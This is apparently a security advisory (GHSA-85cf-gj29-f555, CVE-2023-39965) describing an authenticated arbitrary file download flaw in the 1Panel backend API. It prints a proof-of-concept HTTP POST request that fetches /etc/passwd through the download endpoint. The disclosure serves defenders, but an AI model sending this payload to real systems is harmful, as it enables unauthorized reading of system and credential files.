1Panel Arbitrary File Download vulnerability

GHSA-85cf-gj29-f555 · CVE-2023-39965 · GO-2023-2005

Published Aug 10, 2023 · Modified Aug 21, 2024

Description

Any file downloading vulnerability exists in 1Panel backend.

Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.

payload:

POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json

{"path":"/etc/passwd"}

f77959349e96543436eea18283fa75c

Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.

Ready to move

Free, no credit card | First findings in minutes